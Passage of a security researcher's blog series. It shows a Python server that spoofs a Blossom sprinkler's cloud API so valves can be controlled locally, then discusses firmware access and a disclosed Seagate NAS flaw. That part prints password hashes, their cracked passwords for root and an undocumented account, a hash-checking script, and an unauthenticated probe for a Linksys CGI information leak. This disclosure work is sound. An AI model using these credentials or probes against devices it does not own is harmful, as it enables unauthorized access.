On to the second option, which is more or less a derivative of the first. I am going to trick the Blossom device into staying online. Next, I'll track our watering schedule and issue commands to open and close each valve I care about. In this way, I will remove the need for both the internet-facing Blossom API and PubNub API while retaining the ability to water my lawn when I want. Ok, here I go.....

Upon boot, the device performs a variety of requests to prepare for operation.

Once the API hostnames resolve, the Blossom makes three HTTP requests.

[redacted] - - [28/Nov/2015 09:12:46] "GET /firmware-check/0.json?q=0.8.1035&c=[redacted] HTTP/1.1" 404 -
[redacted] - - [28/Nov/2015 09:12:48] "GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=w HTTP/1.1" 200 -
[redacted] - - [28/Nov/2015 09:12:55] "GET /device/v1/server/ HTTP/1.1" 200 -

The first is a firmware check, which seems to occur at every boot and every 3600 seconds thereafter. The frequency of this check can be changed using the ota_freq variable in the do_GET function of the Handler class within the code for this blog post. If the device receives a 404 HTTP response code, it moves along. The second and third requests are what keep the device online, and they must receive a properly constructed response. That is easy enough: just follow their JSON format. Since the firmware request returns a 404 response code with no JSON structure, I'll skip that one.

GET /api/device/v1/server/?q=0.8.1035&fs=0.0.9&c=[redacted]&n=w HTTP/1.1
Host: home.myblossom.com
User-Agent: WMSDK

HTTP/1.1 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Date: Fri, 20 Nov 2015 15:32:32 GMT
Vary: Accept, Cookie
Content-Length: 88
Connection: keep-alive

{"ts": "2015-11-20T07:32:32.259-08:00", "pst_tz_offset": -8.0, "pst_tz_seconds": -28800}
GET /device/v1/server/ HTTP/1.1
Host: home.myblossom.com
User-Agent: WMSDK

HTTP/1.1 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Date: Fri, 20 Nov 2015 15:32:32 GMT
Vary: Accept, Cookie
Content-Length: 88
Connection: keep-alive

{"ts": "2015-11-20T07:32:41.212-08:00", "pst_tz_offset": -8.0, "pst_tz_seconds": -28800}

You'll know everything is going smoothly when the LED on the front display remains a solid green throughout the duration of device uptime.

How about making the Blossom water what I want, when I want it? I'm glad you asked! A few notes first: if you want to make changes to your watering cycle in the future, you'll have to stop the API and make those changes in code first. The same goes for changing which zones are watered in each cycle, and for the zone watering durations. That's okay though, it keeps the mind limber! Let's get down to it.

The code below is annotated with triple-quoted """ blocks; the script is also available without the extra annotations: blossom-py3.py

#!/usr/bin/env python3

"""
First, I need a bunch of imports:
"""

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen
from time import strftime, sleep
from datetime import datetime
from threading import Thread
from json import dumps
from sys import exit

"""
I'll turn off debug; you can enable it later if you want an additional
logging statement.
"""

debug = 0

"""
I'll also create some code to log when valves are opened and closed
and recreate a python 2.7 feature that I needed when trying to quickly
port this over.
"""

def xrange(low,high):
    ''' Recreates the xrange I love from the 2.7 version of Python. '''
    return iter(range(low,high))

def log_it(valve, state):
    ''' Creates a simple log entry for each operation.  '''
    fd = open('blossom.log', 'a+')
    if (state == 1):
        fd.write("{:s} -> Opened valve: {:s}\n".format(str(strftime("%Y-%m-%dT%H:%M:%S")), str(valve)))
    else:
        fd.write("{:s} -> Closed valve: {:s}\n".format(str(strftime("%Y-%m-%dT%H:%M:%S")), str(valve)))
    fd.close()
    return

"""
I'll need a class to tell Blossom to open and close our desired
valves:
"""

class Blossom:
    ''' Instructs the Blossom to perform a desired operation. '''

    """
    The IP address of the Blossom device should be put in the self.apiHost
    variable.
    """

    def __init__(self):
        ''' Defines a shared variable. '''
        self.apiHost = "[redacted]"  # IP Address of Blossom
        return

    """
    To open a valve, I simply send a POST request to the Blossom's
    /bloom/valve with a JSON object containing two keys: valve and
    inverter.  The valve indicates which zone you want to run, and
    inverter is a boolean (either 0 or 1) indicating what state the valve
    should be in.
    """

    def open_valve(self, valveNumber):
        ''' Instructs Blossom to open a valve. '''
        request = Request("http://{:s}/bloom/valve".format(str(self.apiHost)), dumps({"valve":valveNumber,"inverter":1}).encode('ascii'))
        fd = urlopen(request)
        return fd.close()

    """
    The same goes for closing a valve, only the inverter value has been
    changed.
    """

    def close_valve(self, valveNumber):
        ''' Instructs Blossom to close a valve. '''
        request = Request("http://{:s}/bloom/valve".format(str(self.apiHost)), dumps({"valve":valveNumber,"inverter":0}).encode('ascii'))
        fd = urlopen(request)
        return fd.close()


"""
Now I need a class to handle HTTP requests, I'll call it Handler. I
need to define the UUID for our Blossom within this class as well.
"""

class Handler(BaseHTTPRequestHandler):
    ''' Decides how to handle each request. '''

    """
    A function called do_GET is used to handle each received GET request.
    """

    def do_GET(self):
        ''' In the case of an HTTP GET, the request is inspected and an appropriate response is returned. '''

        """
        I do some simple request inspection to decide how to respond. I'll
        also set some headers for the response.
        """

        uuid = "[redacted]"  # Blossom UUID goes here
        if ("firmware-check" not in self.path):
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.send_header('Vary', 'Accept')
            self.send_header('Connection', 'Close')
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()

        """
        This is where the API will decide how to respond based on the received
        request.  The self.path variable contains the URI as it was received
        by the web server. I use this to determine how to build the proper
        response. The self.wfile.write function calls are used to actually
        build the response. The response gets delivered to the client upon
        return.

        The first URI is /device/v1/server/ which is more-or-less a server
        ping. The response contains time information.
        """

        if (self.path == '/device/v1/server/'):
            self.wfile.write('{{"ts": "{:s}", "pst_tz_offset": -8.0, "pst_tz_seconds": -28800}}'.format(str(strftime("%Y-%m-%dT%H:%M:%S"))).encode('ascii'))

        elif ("api" in self.path and "device" in self.path and uuid in self.path):

            """
            The second is /api/device/v1/ and looks for an additional URI value
            called parameters. If the URI contains parameters,
            """

            if ("api" in self.path and "parameters" in self.path):
                self.wfile.write('{{"stats_freq": 3600, "pn_keepalive": 1, "uap_debug": 1, "wave_boost": 1, "ota_freq": 3600, "current_time":"{:s}", "build": 1042, "opn_trip": 40}}'.format(str(strftime("%Y-%m-%dT%H:%M:%S"))).encode('ascii'))

            else:

                """
                Otherwise,
                """

                self.wfile.write('{{"channel": "channel_{:s}", "current_time": "{:s}", "tz_offset": -8.0, "tz_seconds": -28800, "sch_load_time": 24900, "fetch_lead": 3600}}'.format(str(uuid), str(strftime("%Y-%m-%dT%H:%M:%S"))).encode('ascii'))

        """
        And finally, our return statement.
        """

        return

"""
Now for some code to manage the watering schedule.
"""

class Monitor:
    ''' Monitors the current datetime and watering schedule. '''

    """
    I'll need to define a few variables for use later. The variables
    *_scheduleDays indicate what days you want your lawn to be watered.
    The variables *_scheduleTimes indicate what time of day you want your
    lawn watered. The *_zones variable indicates which zones you want
    watered and for how long in seconds you want each valve to be open.
    """

    def __init__(self):
        self.front_scheduleDays = ['Tue', 'Thu', 'Sat']
        self.front_scheduleTimes = [400, 2330]
        self.front_zones = {'zones': [1, 2, 3], 'water_times': [60, 60, 120]}
        self.back_scheduleDays = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri']
        self.back_scheduleTimes = [530, 2355]
        self.back_zones = {'zones': [8, 9, 10, 11, 12], 'water_times': [30, 30, 30, 30, 0]}
        self.days = {'Mon': 0, 'Tue': 1, 'Wed': 2, 'Thu': 3, 'Fri': 4, 'Sat': 5, 'Sun': 6}
        return

    """
    Now I need to start an infinite loop to continually check when to
    water.
    """

    def run(self):
        ''' Continually checks the current datetime and decides whether or not to water. '''
        print(datetime.now(), " -> Starting")
        while True:
            print(datetime.now(), " -> Checking schedule")

            """
            I start by getting the current day of the week and time.
            """

            self.current_day = datetime.today().weekday()
            self.current_time = int(datetime.now().strftime('%H%M'))

            """
            Next, I decide whether or not self.current_day is a day of the week
            that I want to water my lawn.  This is for the front yard; I'll repeat
            for the back yard as well.
            """

            for schedule_day in self.front_scheduleDays:
                if self.days[schedule_day] == self.current_day:
                    for schedule_time in self.front_scheduleTimes:
                        if debug == 1: print(datetime.now(), " -> [F] Checking if ", self.current_time, " is in ", xrange(schedule_time-1, schedule_time+1))

                        """
                        Next, I decide whether or not self.current_time is within the time
                        window when I want to water my lawn. If I use a sleep of thirty
                        seconds at the end of each loop iteration, assuming self.current_time
                        falls within the allotted window (+/- 1 minute) and you water two zones
                        at a minimum of thirty seconds each, there shouldn't be any issues.
                        This isn't the best way of doing this, but it works satisfactorily.
                        """

                        if self.current_time in xrange(schedule_time-1, schedule_time+1):

                            """
                            Finally, I can begin to iterate through our zones to be watered and
                            open the valves for each.
                            """

                            for zone_info in zip(self.front_zones['zones'], self.front_zones['water_times']):
                                if (zone_info[1] > 0):

                                    """
                                    Open the valve.
                                    """

                                    print(datetime.now(), " -> [F] Opening valve: ", zone_info[0])
                                    log_it(zone_info[0], 1)
                                    Blossom().open_valve(zone_info[0])

                                    """
                                    Make it rain!
                                    """

                                    sleep(zone_info[1])

                                    """
                                    Remember to close the valve. If you don't, you'll be watering until
                                    you do.
                                    """

                                    print(datetime.now(), " -> [F] Closing valve: ", zone_info[0])
                                    log_it(zone_info[0], 0)
                                    Blossom().close_valve(zone_info[0])

            """
            Rinse and repeat with the back yard.
            """

            for schedule_day in self.back_scheduleDays:
                if self.days[schedule_day] == self.current_day:
                    for schedule_time in self.back_scheduleTimes:
                        if debug == 1: print(datetime.now(), " -> [B] Checking if ", self.current_time, " is in ", xrange(schedule_time-1, schedule_time+1))
                        if self.current_time in xrange(schedule_time-1, schedule_time+1):
                            for zone_info in zip(self.back_zones['zones'], self.back_zones['water_times']):
                                if (zone_info[1] > 0):
                                    print(datetime.now(), " -> [B] Opening valve: ", zone_info[0])
                                    log_it(zone_info[0], 1)
                                    Blossom().open_valve(zone_info[0])
                                    sleep(zone_info[1])
                                    print(datetime.now(), " -> [B] Closing valve: ", zone_info[0])
                                    log_it(zone_info[0], 0)
                                    Blossom().close_valve(zone_info[0])  # zone_info[0] is the valve number

            """
            Sleep at the end of each iteration.
            """

            sleep(30)

        """
        Finally, return to the caller.
        """

        return


"""
I also need a main routine to get things going.
"""

def main():
    ''' Spawn a thread for datetime monitoring. Serve the API. '''

    """
    I'll use two threads. The parent will run the web server, and a child
    thread will monitor the schedule and instruct Blossom on operations to
    be performed.
    """

    Thread(name='monitor-schedule', target=Monitor().run, args=()).start()

    """
    Now I'll start the API.
    """

    try:
        server = HTTPServer(('', 81), Handler)
        server.serve_forever()
    except KeyboardInterrupt:
        print("^C received, shutting down the web server")
        server.socket.close()
    return exit(1)

"""
Run main.
"""

if __name__ == "__main__":
    main()
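
Before trusting the scheduler, it's handy to exercise a single valve by hand. The snippet below is a quick standalone sketch of the same /bloom/valve POST the Blossom class uses; the device IP and valve number are placeholders you'll need to fill in. It opens the valve, waits ten seconds, and closes it.

#!/usr/bin/env python3
# Quick manual test of the /bloom/valve endpoint used by the Blossom class above.
# BLOSSOM_IP and VALVE are placeholders; set them for your own device.
from urllib.request import Request, urlopen
from json import dumps
from time import sleep

BLOSSOM_IP = "192.168.50.20"   # local IP of the Blossom (placeholder)
VALVE = 1                      # zone/valve number to exercise (placeholder)

def set_valve(valve, inverter):
    # inverter: 1 opens the valve, 0 closes it, matching the Blossom class.
    body = dumps({"valve": valve, "inverter": inverter}).encode('ascii')
    urlopen(Request("http://{:s}/bloom/valve".format(BLOSSOM_IP), body)).close()

set_valve(VALVE, 1)   # open
sleep(10)             # let it run briefly
set_valve(VALVE, 0)   # close it again -- otherwise it keeps watering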

I hope you enjoyed reading this blog; I had fun writing it. I've had this configuration deployed for a few weeks now, and so far it's working pretty well. Next week, I'll be talking about an undocumented account in an IoT device.

The importance of access to firmware files

Welcome to the third part of our series! Today I hope to spark a conversation amongst the readers about an important topic in a world filled with IoT: access to device firmware. And not just (at best) encrypted opaque blobs provided for device updates, but usable images that can be deconstructed, evaluated, and reconstructed.

There are a few categories of devices for which firmware access would apply. These are consumer, enterprise, medical, and military. My coworkers and I have dealt with all of these to varying degrees. You might think military procurement would always include full firmware/source code access; I mean, they'll want to make sure the device is not designed in a way that is counter to their interests in the same way that I want to ensure the same thing when I (and most other people for that matter) also purchase a device. Mumble mumble...

What about consumer or enterprise grade devices? Most vendors have some support level (i.e. price point) at which they'll give an enterprise customer access to firmware. But smaller organizations, or one-off purchasers, are often told what I am told as a consumer a majority of the time: "no". In the last two parts of our series, I'll go into deeper thought on firmware access using current and upcoming examples from our vulnerability disclosure program.

An advisory for the first example I'll use has been released in coordination with this blog under CVE-2015-2874. The advisory, KL-001-2015-007.txt, is for an undocumented account in a portable NAS developed by Seagate.

Download URL: http://www.seagate.com/support/downloads/item/satellite-firmware-master/

The firmware of the affected device is designed so that the end user of the device has complete control of the underlying operating system. They have root. While I love this concept for a product, it certainly doesn't mean the product has no faults. An undocumented account is certainly a fault that should be corrected. Seagate quickly acknowledged the account's existence and within a few weeks had produced a patch that removed the account. The account didn't have any privilege, but it did allow shell access. The reason I reported it is that, from an incident response perspective, it's hard to triage an issue about an account on a device that you didn't know existed. Here is how I found it.

I started off by running binwalk:

root@itsasmallworld:/tmp# binwalk satellite_firmware_xf_DVT_1.3.7.001.bin 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             POSIX tar archive (GNU)

Since this file is in the tar format, I'll use the tar command to extract it.

root@itsasmallworld:/tmp# tar xvf satellite_firmware_xf_DVT_1.3.7.001.bin
uImage
uImage_md5sum_pc
rootfs.jffs2
rootfs.jffs2_md5sum_pc

After extraction, we're left with a few other files, which include a JFFS2 filesystem image.

root@itsasmallworld:/tmp# ls
rootfs.jffs2  rootfs.jffs2_md5sum_pc  satellite_firmware_xf_DVT_1.3.7.001.bin
uImage        uImage_md5sum_pc

We can easily extract the files and directory structure from the image using unjffs2. This application is developed by Craig Heffner of the devttys0.com blog.

root@itsasmallworld:/tmp# unjffs2 rootfs.jffs2 jfroot/
FATAL: Module mtdchar not found.
Error: Module mtdram is not currently loaded
97280+0 records in
97280+0 records out
49807360 bytes (50 MB) copied, 0.880434 s, 56.6 MB/s
JFFS2 image mounted to jfroot/
root@itsasmallworld:/tmp# cd jfroot/
root@itsasmallworld:/tmp/jfroot# ls
bin             home            media           sbin            sys
boot            include         mnt             share           tmp
dev             lib             proc            srv             usr
etc             linuxrc         satellite_app   static          var

Now we'll browse to the /etc directory and review the associated passwd files.

root@itsasmallworld:/tmp/jfroot# cd etc
root@itsasmallworld:/tmp/jfroot/etc# ls
angstrom-version     init.d               org_passwd           rpc
autoUpdURL           inittab              passwd               scsi_id.config
avahi                inputrc              passwd-              services
busybox.links        internal_if.conf     profile              skel
dbus-1               ipkg                 profile.d            syslog.conf
default              iproute2             protocols            terminfo
device_table         issue                rS.d                 timestamp
device_table-opkg    issue.net            rc0.d                tinylogin.links
fb.modes             localtime            rc1.d                ts.conf
filesystems          mke2fs.conf          rc2.d                udev
fstab                motd                 rc3.d                udhcpc.d
group                mtab                 rc4.d                udhcpd.conf
host.conf            network              rc5.d                udhcpd_factory.conf
hostname             nsswitch.conf        rc6.d                version
hosts                opkg                 rcS.d
root@itsasmallworld:/tmp/jfroot/etc# cat passwd
root:VruSTav0/g/yg:0:0:root:/home/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
xoFaeS:QGd9zEjQYxxf2:500:500:Linux User,,,:/home/xoFaeS:/bin/sh

The xoFaeS user is not discussed in the GoFlex documentation and the hash cracked to etagknil. The root user is documented and the hash cracked to goflex.
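
Since both entries are traditional DES crypt hashes (the first two characters are the salt), the recovered passwords can be sanity-checked straight from Python. This is a minimal sketch, assuming a Unix build of Python where the crypt module is available (it was deprecated in 3.11 and removed in 3.13):

#!/usr/bin/env python3
# Sanity-check the recovered passwords against the DES crypt hashes from passwd.
# Requires a Unix Python that still ships the crypt module.
import crypt

entries = {
    "root":   ("VruSTav0/g/yg", "goflex"),
    "xoFaeS": ("QGd9zEjQYxxf2", "etagknil"),
}

for user, (hashed, guess) in entries.items():
    # Traditional DES crypt takes the first two characters of the hash as the salt.
    result = "match" if crypt.crypt(guess, hashed[:2]) == hashed else "no match"
    print("{:s}: {:s}".format(user, result))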

Here is something interesting about the xoFaeS account: it was the first real _user_ on the system. The UID 500 and generalized account description typically correlate to the first user created after system installation. Between that fact and the quick recognition and removal of the account, I would bet this was merely an accident. But that's OK! Because Seagate allows end users to access firmware, I was able to discover the account and help ensure it got removed. How about a vendor that doesn't put in that kind of effort? Let's use Linksys as an example.

Week one of my series was spent discussing a series of vulnerabilities in the Linksys EA6100 access point. Linksys allows end users to access firmware. They also allow custom firmware to be installed on many of their devices. However, they weren't exactly responsive to our disclosures. In fact, they didn't respond at all. They eventually violated our disclosure policy through a lack of response, and as such we disclosed the vulnerabilities so that end users may take steps to address them on their own. Most of the issues were centered around information being disclosed through a CGI file, sysinfo.cgi, which returned copious amounts of information about the operation of the device. Since Linksys has an open position on firmware and hardware access, simply removing that CGI file resolved some of the discovered issues.
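
If you own one of these access points and want to check your own exposure, an unauthenticated request to the CGI is enough to tell. This is a minimal sketch: the device IP is a placeholder, and the exact CGI path should be taken from the advisory (the path shown here is only an assumption). A 200 response with a large body is the tell-tale.

#!/usr/bin/env python3
# Check whether the information-disclosure CGI is still reachable without auth.
# DEVICE_IP is a placeholder; CGI_PATH is an assumed path -- take the real one
# from the advisory.
from urllib.request import urlopen
from urllib.error import HTTPError, URLError

DEVICE_IP = "192.168.1.1"     # placeholder
CGI_PATH = "/sysinfo.cgi"     # assumption; see the advisory for the real path

try:
    with urlopen("http://{:s}{:s}".format(DEVICE_IP, CGI_PATH), timeout=5) as resp:
        body = resp.read()
        print("HTTP {:d}, {:d} bytes returned".format(resp.status, len(body)))
except (HTTPError, URLError) as err:
    print("Request failed (possibly removed): {}".format(err))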

So, we've discussed two devices whose firmware can be easily accessed. Although the vendor response was mixed, ultimately the issues could be addressed on an individual basis. So why wouldn't every device manufacturer take the same position? Maybe you can augment my list, but I've seen a few scenarios. Let's go back to my earlier statement: "I mean, they'll want to make sure it's not designed in a way that is counter to their interests in the same way that I want to ensure the same thing when I purchase a device."

Sometimes, devices aren't designed entirely how we perceive them to be. One thing I have come to learn quite well is that when you purchase a device you may or may not be done paying for it. Sometimes a payment isn't money but rather information. What the heck does that mean? Well.. Take the Blossom for example. The Blossom is a relatively cheap device (~$100) that you install on your network and eventually controls the watering of your lawn. I discussed the Blossom in detail in part two of our series but I will quickly re-highlight a passage in their privacy policy that is pretty important to the thesis of this part:

What We Collect

[snip]
We also collect passive information such as your IP address on certain
IConservo Products, your ZIP code, as well as information about your
IConservo Product such as MAC addresses, product model numbers,
software versions, chipset IDs, and region and language settings.
Passive information also includes information about the products you
request or purchase, the presence of other devices connected to your
local network, and the number of users and frequency of use of
IConservo Products and Services. We also collect passive information
regarding customer activities on our website. Some passive information
may be associated with personally identifying information. [snip]

Who We Share With

We work with third parties in connection with some aspects of the
ICONSERVO Products and Services, such as but not limited to processing
payments and providing marketing assistance. 
[snip]

So we're back to: "the presence of other devices connected to your local network." Remember, sometimes information is our payment. This type of data collection can be turned around, packaged, and sold to advertisers. Now, that may or may not be the case here. You can decide for yourself based on the full policy located at: http://myblossom.com/legal/iconservo-privacy-statement/

This type of approach actually allows manufacturers to make IoT devices at a cheaper price because you're never really done paying for it. This isn't the only reason (I think) I have been told no when requesting firmware for devices I purchase though. Businesses can take an extreme perspective on intellectual property. Should the device have a novel feature there could then be paranoia that the feature may be reverse engineered and suddenly spring up in other devices. I suppose I can be somewhat sensitive to that issue, but I still side with the notion that if I have purchased a device then I should very well be able to inspect that device to whatever degree I determine to be acceptable.

What about a device manufacturer hoping to retain security through obscurity by denying firmware access to consumers? How often have we in the industry seen this approach be successful? Join us next time (there may be a small delay in our disclosure process, so it likely will not be next week), when we will continue this discussion using that exact argument. Spoiler alert: denying access doesn't make your device more secure than it already isn't.
